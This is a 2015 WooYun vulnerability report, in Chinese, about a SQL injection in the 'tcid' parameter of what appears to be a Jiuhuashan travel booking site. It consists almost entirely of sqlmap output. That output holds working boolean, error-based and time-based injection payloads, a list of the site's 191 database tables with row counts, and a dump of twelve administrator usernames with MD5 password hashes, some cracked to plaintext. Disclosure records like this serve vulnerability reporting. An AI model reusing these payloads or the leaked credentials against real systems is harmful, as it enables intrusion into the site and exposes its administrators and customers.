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漏洞作者: me1ody

提交时间:2015-09-23 17:22

修复时间:2015-11-07 17:24

公开时间:2015-11-07 17:24





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-09-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-07: 厂商已经主动忽略漏洞,细节向公众公开






sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: tcid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tcid=4) AND 2762=2762 AND (9972=9972
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.13
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] newjiuhuashan
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: tcid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tcid=4) AND 2762=2762 AND (9972=9972
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.13
back-end DBMS: MySQL 5.0
Database: newjiuhuashan
[191 tables]
| ad |
| ad_position |
| admin |
| admin_group |
| admin_module |
| admin_module_operate |
| admin_privileges |
| area |
| article |
| article_cate |
| article_pic |
| article_video |
| bus |
| bus_brand |
| bus_channel |
| bus_channel_group |
| bus_city |
| bus_order |
| bus_pic |
| bus_price |
| bus_price_project |
| bus_price_project_price |
| bus_price_type |
| bus_type |
| bus_type_price_project |
| bus_vas |
| bus_vas_order |
| channel |
| channel_group |
| compose |
| for_buddha |
| for_thing |
| get_ticket_log |
| guestbook |
| guide |
| guide_channel |
| guide_channel_group |
| guide_order |
| guide_pic |
| guide_price |
| guide_price_project |
| guide_price_project_price |
| guide_price_type |
| hotel |
| hotel_pic |
| hotel_price |
| hotel_price140102 |
| hotel_price_project |
| hotel_price_project_price |
| hotel_price_type |
| hotel_price_type_content |
| hotel_room |
| hotel_room_allot |
| hotel_room_channel |
| hotel_room_channel_group |
| hotel_room_num |
| hotel_room_order |
| hotel_room_order_info |
| hotel_room_pic |
| hotel_room_price |
| hotel_room_price_project |
| hotel_room_price_project_price |
| hotel_room_price_type |
| hotel_room_type |
| hotel_service |
| hotel_service_cate |
| hotel_service_cate_content |
| hotel_service_channel |
| hotel_service_channel_group |
| hotel_service_info |
| hotel_service_meeting_put |
| hotel_service_order |
| hotel_service_order_info |
| hotel_service_pic |
| hotel_service_vas |
| income_log |
| indent |
| intro |
| iptocity |
| line |
| line_city |
| line_client |
| line_content |
| line_dir |
| line_goal |
| line_list |
| line_order |
| line_order_info |
| line_pic |
| line_price |
| line_price_project |
| line_price_project_price |
| line_price_project_temp |
| line_price_type |
| line_rank |
| line_temp |
| line_topic |
| line_travel |
| links |
| links_cate |
| mail_config |
| mail_message |
| member_group |
| members |
| my_tags |
| mycart |
| mycart_vas |
| operate_order_log |
| operate_shortcut |
| order_status_log |
| orders |
| other_fees |
| package |
| package_cate |
| package_channel |
| package_channel_group |
| package_order |
| package_pic |
| pay_log |
| pay_method |
| personal_line |
| plate |
| recom_position |
| redeem_place |
| rent_car |
| rent_car_area |
| rent_car_brand |
| rent_car_channel |
| rent_car_channel_group |
| rent_car_content |
| rent_car_num |
| rent_car_order |
| rent_car_pic |
| rent_car_price |
| rent_car_price_project |
| rent_car_service_point |
| rent_car_vas |
| rent_car_vas_cart |
| rent_car_vas_order |
| route |
| route_ip |
| runningtime |
| s_pic |
| sarea |
| sarea_cate |
| sms_config |
| specialty |
| specialty_channel |
| specialty_channel_group |
| specialty_order |
| specialty_order_info |
| specialty_pic |
| specialty_type |
| ticket |
| ticket_cate |
| ticket_cate_content |
| ticket_cate_pic |
| ticket_channel |
| ticket_channel_group |
| ticket_content |
| ticket_order |
| ticket_order_info |
| ticket_pic |
| ticket_price |
| ticket_price_project |
| ticket_price_project_price |
| ticket_price_type |
| ticket_price_type_content |
| ticket_vas |
| tpl |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
| web_config |
| wish |
Database: newjiuhuashan
| Table | Entries |
| iptocity | 319356 |
| route_ip | 187150 |
| hotel_room_price | 50412 |
| hotel_price140102 | 47530 |
| for_buddha | 25180 |
| ticket_price | 11894 |
| article | 10218 |
| hotel_room_num | 10037 |
| line_price | 9423 |
| uc_memberfields | 8976 |
| uc_members | 8976 |
| article_pic | 3549 |
| wish | 2878 |
| guestbook | 2286 |
| uc_pms | 1331 |
| mail_message | 1004 |
| bus_price | 894 |
| orders | 763 |
| members | 760 |
| admin_privileges | 721 |
| s_pic | 497 |
| hotel_room_order | 428 |
| hotel_room_pic | 414 |
| personal_line | 389 |
| admin_module_operate | 342 |
| ticket_order_info | 308 |
| guide_price | 272 |
| ticket_order | 260 |
| hotel_service_pic | 244 |
| hotel_room_price_project_price | 230 |
| hotel_room_price_project | 215 |
| article_cate | 201 |
| operate_order_log | 200 |
| bus | 189 |
| mycart | 154 |
| article_video | 114 |
| hotel_price_project_price | 103 |
| hotel_pic | 99 |
| route | 99 |
| sarea | 81 |
| line_list | 70 |
| pay_log | 65 |
| rent_car_price | 63 |
| line_order | 61 |
| hotel_service | 58 |
| hotel_room_order_info | 53 |
| income_log | 53 |
| ad | 52 |
| hotel_price_project | 50 |
| links | 49 |
| my_tags | 48 |
| rent_car_pic | 48 |
| order_status_log | 47 |
| line_price_project_price | 46 |
| compose | 39 |
| hotel_room_type | 39 |
| hotel_room | 37 |
| bus_city | 34 |
| ad_position | 33 |
| line_price_project | 33 |
| hotel_room_price_type | 30 |
| line | 30 |
| line_content | 30 |
| admin | 28 |
| ticket_pic | 28 |
| mail_config | 27 |
| sms_config | 27 |
| hotel_service_info | 26 |
| uc_settings | 24 |
| ticket_price_project_price | 23 |
| admin_module | 21 |
| hotel_service_order | 21 |
| hotel_room_allot | 18 |
| rent_car_area | 17 |
| ticket_price_project | 16 |
| ticket_price_type | 16 |
| ticket_price_type_content | 16 |
| specialty_order | 14 |
| intro | 13 |
| line_price_type | 13 |
| operate_shortcut | 13 |
| rent_car_order | 13 |
| rent_car_vas | 13 |
| bus_price_project_price | 12 |
| ticket_channel_group | 12 |
| uc_notelist | 12 |
| specialty_pic | 11 |
| uc_friends | 11 |
| hotel_service_channel_group | 10 |
| line_city | 10 |
| redeem_place | 9 |
| rent_car | 9 |
| rent_car_content | 9 |
| tpl | 9 |
| plate | 8 |
| recom_position | 8 |
| bus_type | 7 |
| get_ticket_log | 7 |
| line_pic | 7 |
| package_pic | 7 |
| uc_vars | 7 |
| bus_price_project | 6 |
| hotel | 6 |
| hotel_price_type | 6 |
| hotel_price_type_content | 6 |
| specialty | 6 |
| ticket | 6 |
| ticket_content | 6 |
| admin_group | 5 |
| hotel_service_cate | 5 |
| hotel_service_cate_content | 5 |
| hotel_service_meeting_put | 5 |
| links_cate | 5 |
| pay_method | 5 |
| bus_channel_group | 4 |
| hotel_room_channel_group | 4 |
| line_dir | 4 |
| package_order | 4 |
| specialty_channel_group | 4 |
| ticket_cate | 4 |
| ticket_cate_content | 4 |
| bus_brand | 3 |
| bus_vas | 3 |
| guide_order | 3 |
| line_client | 3 |
| line_rank | 3 |
| member_group | 3 |
| rent_car_brand | 3 |
| rent_car_num | 3 |
| rent_car_price_project | 3 |
| area | 2 |
| bus_price_type | 2 |
| channel_group | 2 |
| guide_channel_group | 2 |
| guide_price_project | 2 |
| guide_price_project_price | 2 |
| line_goal | 2 |
| package_channel_group | 2 |
| rent_car_channel_group | 2 |
| rent_car_vas_cart | 2 |
| sarea_cate | 2 |
| specialty_type | 2 |
| ticket_vas | 2 |
| uc_applications | 2 |
| uc_protectedmembers | 2 |
| bus_order | 1 |
| channel | 1 |
| guide | 1 |
| guide_price_type | 1 |
| hotel_service_channel | 1 |
| hotel_service_vas | 1 |
| line_topic | 1 |
| line_travel | 1 |
| other_fees | 1 |
| package_cate | 1 |
| package_channel | 1 |
| uc_admins | 1 |
| uc_failedlogins | 1 |
| web_config | 1 |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Parameter: tcid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tcid=4) AND 2762=2762 AND (9972=9972
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.13
back-end DBMS: MySQL 5.0
Database: newjiuhuashan
Table: admin
[12 entries]
| admin_pass | admin_name |
| 5fab2371ef76580f044d4ce39b94901b | admin |
| 8f2e74bf8baf0e0ca8778c440c8dfcf6 (woaishe)| raojun |
| 682ce69d7111440079343a3ad2297009 | panda |
| 800a53aa5a1b319bd86c4e1d496f2af8 | yefei |
| b4096479db9125c874222697b6522df4 | zhaoqh |
| ef33c351893e7baa713ff4fe560f694b | lqf |
| f75991e2ee1593e2ca84e3cb8ddfd906 | dx |
| 0b5d9ca0acb73689904f41a035af4ad7 | weihua |
| 0276cbf4fbfedd53ba48720a58df77e3 (222111) | chl |
| 96e79218965eb72c92a549dd5a330112 (111111) | nieg |
| 4c3141ef4b76d341fbd2efb86241ac34 | jhgf |
| d8fee065fbfb4ee8ca989f9db2a47651 | zhusf |
















版权声明:转载请注明来源 me1ody@乌云




